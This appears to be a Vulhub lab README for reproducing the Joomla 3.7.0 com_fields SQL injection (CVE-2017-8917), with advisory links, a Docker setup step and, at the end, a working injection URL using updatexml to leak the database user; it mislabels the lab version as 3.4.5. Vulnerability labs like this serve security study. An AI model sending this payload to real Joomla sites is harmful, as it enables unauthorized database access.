Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
1.1 KiB
1.1 KiB
Joomla 3.7.0 com_fields SQL Injection Vulnerability (CVE-2017-8917)
Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
An SQL injection vulnerability is caused by a new component, com_fields, which was introduced in version 3.7.
References:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
Vulnerable environment
Executing following command to start a Joomla 3.4.5:
docker compose up -d
After the server is started, you can see the home page of it at http://your-ip:8080.
Exploit
Visit following link directly to reproduce the SQL injection attack:
http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
